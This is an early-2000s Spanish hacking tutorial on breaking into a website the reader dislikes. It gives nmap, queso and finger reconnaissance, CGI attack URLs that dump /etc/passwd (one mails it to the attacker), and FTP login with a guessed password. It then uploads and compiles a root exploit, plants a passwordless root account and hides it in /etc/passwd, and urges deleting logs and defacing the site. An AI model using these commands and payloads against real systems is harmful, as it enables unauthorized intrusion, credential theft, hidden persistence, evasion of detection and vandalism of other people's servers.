Como hackear ese web que tanto te molesta
By el_sa[N]to
 ____________________________________________________________________________|
|----------------------------------------------------------------------------
|Antes que nada aclaro que no me hago responsable del uso que le des a las   
|tecnicas que te voy a dar, solo lo hago porque estaba aburrido y tenia ganas
|de escribir algo.                                                           
|----------------------------------------------------------------------------
|----------------------------------------------------------------------------
|Este texto esta escrito para hacer todo en Linux, asi que si sos usuario de 
|win, no te digo que te pases a Linux, aunque seria lo mejor, sino que vayas 
|pensando que para divertirte mas este es el SO adecuado. Proba el Winlinux  
|que se instala y desisntala como un programa mas de windows sin que tengas  
|formatear el disco u ocuparte por el tama¤o de las particines ni nada       
|----------------------------------------------------------------------------
|____________________________________________________________________________|

 A ver, este texto se trata de como hackear un web. Se que el tema esta re-quemado
en todos lados, pero la mayoria de las veces no esta bien explicado, o el
nivel no es muy bueno.
 Primero, aclaro que si bien los sistemas operativos tipo Unix son los mas
seguros, la seguridad de un web no depende solo de eso, sino de fijarse en
tener todo configurado como se debe y no dejar nada al voleo, ya que si bien
muchos usuarios no se van a fijar como esta configurado, hay otros(como nosotros)
que van a sentir curiosidad de cuanta importancia le dan a la seguridad en ese
web.

|------------------|
|Empezemos
|------------------|

  La mayoria de las herramientas para hacer esto, ya estan incorporadas al Linux,
sin importar la distribucion. Para hacer esto las principales que vamos a usar
son: 1-telnet, 2-ftp, 3-Queso, 4-NMAP, 5-finger

|--------------------------------------------------------------------------------------------------------------------------------------|
| NMAP se consige gratis en www.insecure.org/nmap/index.html. NMAP es un escaneador de           
|redes.	
| Queso se consigue www.apostols.org/projectz/queso/ Queso sierve para buscar que SO y su        
|distribucion. Es bastante acertado la mayoria de las |veces. Supongo que despues de tener el SO y la distribucion ya sabes que hacer (por las dudas,  te doy una pista, empeza a buscar algun exploit para probarlos y boludear, pero eso lo voy a explicaren otro texto)   									 
|--------------------------------------------------------------------------------------------------------------------------------------|

  Suponiendo que estas en la consola (si no estas abri desde el X, un emulador
de consola), escribi lo siguiente:

[santo@thedungeon /]# nmap -sS www.loquequieras.com

|---------------------------------------------------------------------------------------------------------------------|
|Donde www.loquieras.com es la direccion de la pagina que estas revisando De
|ahora en mas, para que sea mas comodo y entendible, vamos a poner          
|www.todio.com                                                              
|--------------------------------------------------------------------------------------------------------------------|

 Lo que nos va a mostrar va a ser algo como esto:

Starting nmap
Interesting ports on www.todio.com (231.215.113.234):
Port    State       Protocol  Service
21      open        tcp        ftp             
23      open        tcp        telnet  
25      open        tcp        smtp            
79      open        tcp        finger
80      open        tcp        http            
512     open        tcp        exec            
513     open        tcp        login           
514     open        tcp        shell     
Continua....

 Despues de ver esto sabemos que tenemos muchos puertos para investigar y jugar [porque todos sabemos
que esto es un juego =)]. Algunos son el 21 (FTP) que no va a servir para bajar y subir archivos,
el 25 (SMTP), que es el que se usa para mandar mails (en nuestro caso, lo podemos usar para mandar
mails anonimos), el 79 (Finger) que es el que nos da informacion acerca del SO (esto lo usamos 
para aprovecharnos de sus fallas), el 80 (HTTP), este sabiamos que estaba abierto ya que estabamos
atacando un web (por ejemplo subimos por FTP "nuestro" index y lo redireccionamos para que en 
lugar de mostrar el de la pagina muestre el que nosotros queremos). Esos solo son algunos, despues
podemos usar los puertos grandes, para meter un troyano para mantener la cuenta de root que obtuvimos
antes. Son muchos los puertos abiertos.

 Ya tenemos bastantes datos, uno de estos es el finger, que nos da informacion acerca de los usuarios
que estan conectados al sistema. Lo que hacemos es esto:

[santo@thedungeon /]# finger @www.todio.com
www.todio.com
Login	     Nombre		     TTY
JuCalabera   Admin Calabera          tty1
RCarlos      Roberto Carlos Suarez   tty2
LDoming      Luis Dominguez          tty5
Continua...

 Con esto sabemos que el admin y otros usuarios estan conectados. Esto lo podemos aprovechar, ya que
muchos admins no usan mucho el comando who y no ven los usuarios que estan conectados en ese
momento al sistema, y como este no avisa si no se hace un script quien se esta logeando, ya sabemos
que hacer, no? =)

 Ahora lo que vamos a hacer es esto, correr el Queso para que averigue el SO. Podriamos usar el
telnet para que nos de la bienvenida y nos pida el login, y tambien muestre el SO en el prompt
como por decir uno, hace el Red Hat 6.2, que dice Linux Red Hat 6.2 (ZooL), pero modificando
los archivos issue e issue.net esto lo podemos cambiar para que diga lo que queramos. Por eso 
vamos a usar el Queso. Hacemos lo siguiente

[santo@thedungeon /]# queso -vz www.todio.com
[www.todio.com]
Red Hat 7.0 kernel 2.2.6

 Con esto ya sabemos que esta maquina esta ejecutando en la red el Linux Red Hat 7.0, una dsitribucion
que esta llena de bugs, ya que quisieron incorporar muchas cosas nuevas pero no fueron bien
implementadas, y que no esta usando el ultimo kernel.

 Seguimos buscando informacion, ahora hacemos

[santo@thedungeon /]# telnet www.todio.com 25
Conectando a 231.215.113.234...
Conectado a 231.215.113.234
220 www.todio.com ESMTP Sendmail 8.10.1 Miercoles, 6 Junio 2001 18:44

 Ahi sabemos la version del cliente de mails. Despues podemos tratar de mandar mails para boludear
un rato.

 Como estamos tratando de conseguir la mayor cantidad de informacion del web, empezamos a buscar,
si es que este tiene, archivos cgi. Si estos estan mal configurados, o su codigo mal escrito, nos
van a dejar conseguir el archivo /etc/passwd, que es donde la mayoria de los sistemas unix guardan
los pass del sistema. Como antes ya vimos que el admin de este no se preocupaba mucho por la seguridad
de este, asi que seguro que los cgi tienen esta falla.
 Lo que tenemos que hacer es ir poniendo en nuestro navegador las siguientes direcciones:

www.todio.com/cgi-bin/wais.pl/set%20Gopher=/bin/cat%20/etc/passwd
www.todio.com/cgi-bin/php.cgi?/etc/passwd
www.todio.com/cgi-bin/fi?/etc/passwd
www.todio.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
www.todio.com/cgi-bin/webdist.cgi?/bin/mail%20:/etc/passwd[mi@direcciondemail.com]

 Como vemos en el ultimo, tenemos que poner una direccion de mail, para que mande el archivo 
etc/passwd, como seria muy facil que despues el admin descubra a donde fue ese archivo por los logs
lo mandamos a una cuenta gratuita, por ejemplo, sacas la cuenta en mixmail, starmedia, o alguno de
esos webmails chorongos, y lo mandas ahi.

 Por ultimo, podemos si queremos asegurarnos de que no esta bien configurado (en este momento creo
que ya es suficiente lo que vimos para darnos cuenta, pero bueh, si en otro caso lo queres usar, aca
te digo como), revisar el FTP. Lo que tenemos que hacer es lo siguiente (de paso vemos si nos acepta las
cuentas nobody, porque no necesitan pass y guest, anonymous, porque el pass es el mismo, si va 
como se instala por defecto):

[santo@thedungeon /]# ftp www.todio.com
Conectando a 231.215.113.234...
Conectado a 231.215.113.234
FTP server (wu-2.1.5)  Miercoles, 6 Junio 2001 18:51

Name: guest
Password:
Login Failed

Name:nobody
Login OK

ftp> ls -tla
PORT command succesful
drwxr-xr-x   8 1 root root      1024 May 25 06:58 .
drwxr-xr-x   8 1 root root      1024 May 25 06:58 ..
drwx-wx-wx   2 1 root root      1024 Jul 25 06:58 pub
drwxrwxrwx   2 1 root root      1024 Jul 25 06:58 bin
drwxrwxrwx   1 1 root root      4353 Jul 25 06:58 Awachimeichu.text
drwxrwxrwx   2 1 root root      1024 Jul 25 06:58 pub   
drwxrwx--x   3 1 root root      1024 Jul 25 06:58 usr
Continua...

 Viendo esto nos podemos dar cuenta de que el administrador este no se preocupo mucho por revisar
los permisos del sistema 


|----------------------------------|
|Juntando la informacion
|----------------------------------|

 Bueno, despues de revisar lo que habiamos echo, sabemos las siguientes cosas que nos van a servir
para un futuro no muy lejano =)

1-El admin entra como JuCalabera
2-Conocemos otras dos cuentas: RCarlos, y LDoming
3-Sabemos sus nombres verdaeros, que los podemos probar para conseguir el pass de cada uno
4-Ya sabemos que la cuenta nobody no necesita pass
5-Tenemos que SO usa (RH 7.0) y sabemos que tiene muchas fallas en su configuracion
6-El cliente de mail es el Sendmail y su version la 8.10.1
7-El servidor de FTP esta sobre el wu-2.1.5
8-Si usaste los cgi( cosa que aca yo no hice) tenes tambien el archivos /etc/passwd
9-Mas importante que todo, sabemos que el admin no le da mucha bola a las configuraciones del
server

|--------------|
|Al ataque
|--------------|

 Leo el titulo de esta seccion y me parece que esto fuera una guerra ;). BUeno, lo que vamos a hacer
en este caso es lo siguiente. Abrimos FTP y nos conectamos:

[santo@thedungeon /]# ftp www.todio.com
Conectando a 231.215.113.234...
Conectado a 231.215.113.234
FTP server (wu-2.1.5)  Miercoles, 6 Junio 2001 19:35

Name: LDoming
Password: 
Login OK

 Ya sabemos el pass de esa cuenta (Dominguez), estamos adentro, y ahora tenemos que conseguir una 
cuenta de root. Vamos a subir un exploit (que se consiguen en muchos lados y casi siempre vienen 
con una explicacion en el codigo, no lo compiles porque se te activa, hace vi exploit), que nos de
una cuenta root. Como ya estamos logeados, lo que hacemos es lo siguiente: 

ftp> put ping.c
Transfer complete

ftp> quit

 Con esto conseguimos subir el exploit a la maquina. Ahora, para hacerlo funcionar, hacemos lo 
siguiente. Entramos de vuelta a la maquina con la cuenta de LDoming

[santo@thedungeon /]# telnet www.todio.com 25
Conectando a 231.215.113.234...
Conectado a 231.215.113.234
Red Hat Linux release 7.0
login: LDoming
Password:
Login OK

[LDoming@todio LDoming]$ gcc ping.c -o ping

 Ahi quedo listo para usarlo, ahora lo ejecutamos, y este script lo que va a hacer es crearnos una
cuenta de root con el nombre test y que no va a tener pass. En si, lo que hace este script, si decir
como lo hace es agruegar a /etc/passwd la siguiente linea test::504:504::/tmp:/bin/sh.
 Ahora solo nos queda ejecutarlo para que nuestro "trabajo" tenga exito =)

[LDoming@todio LDoming]$ ./ping -s

 Para probar si el exploit anduvo bien, hacemos lo siguiente: nos delogeamos, y volvemos a entrar
con esa cuenta.

[santo@thedungeon /]# telnet www.todio.com
Conectando a 231.215.113.234...
Conectado a 231.215.113.234
Red Hat Linux release 7.0
login: test
Password:
Login OK

 Funciona!!! Ahora abrimos el archivo /etc/passwd y ponemos la cuenta test en el medio de este, para
que sea mas dificil encontrarla:

[test@todio /]# vi /etc/passwd

JCalabera:BT4bfdk3243bKJ5H87k:0:100:Admin Calabera:/root:/bin/bash
LDoming:dfns7943NFDEI324YU:103:100:Luis Dominguez:/home/LDoming:/bin/bash
continua...

 Al final de todo eso esta nuestra cuenta, solo la  copiamos y la pegamos en el medio (borrando
la que esta al final). Con eso la cuenta ya esta, mas o menos dificil de descubrir

 Como el texto no va orientado a esto, solo te voy a decir que no te olvides de borrar tus logs, ya
que aunque el admin sea lo mas estupido en el mundo, viendo eso, se puede dar cuenta de que alguien
estuvo usando mal el sistema

|-----------------|
|Eso es todo|
|----------------|

 Ya estoy cansado de escribir, y la verdad que no se que mas decirles, asi que solo les doy una idea
de como seguir. Te conectas por el FTP, y subis tu archivo index.html, comentando en ese como estaba
configurado el sistema, que usaste para tomar el control y todo eso. O si no, subi el index.html
diciendo que todo lo hizo el mejor "hacker" del mundo que aprendio del "MJEOR MAESTRO" del mundo
(o sea yo), subiendo otros archivos con los mismos nombres a la pagina pero echos por vos, por
ejemplo, si hay una seccion de Informacion acerca de alguien cambialo para que sea gracioso o 
alguna boludes asi, en este momento no tengo ganas de pensar que hacer
 Cualquier duda escribime a benjicapo@mixmail.com o buscame en el ICQ con el numero 62500027. Si
entras al server de Ciudad[conectados.ciudad.com.ar], me podes encontrar en los canales #Linux,
#hack.ar o #hackgroup

Saludos
el_sa[N]to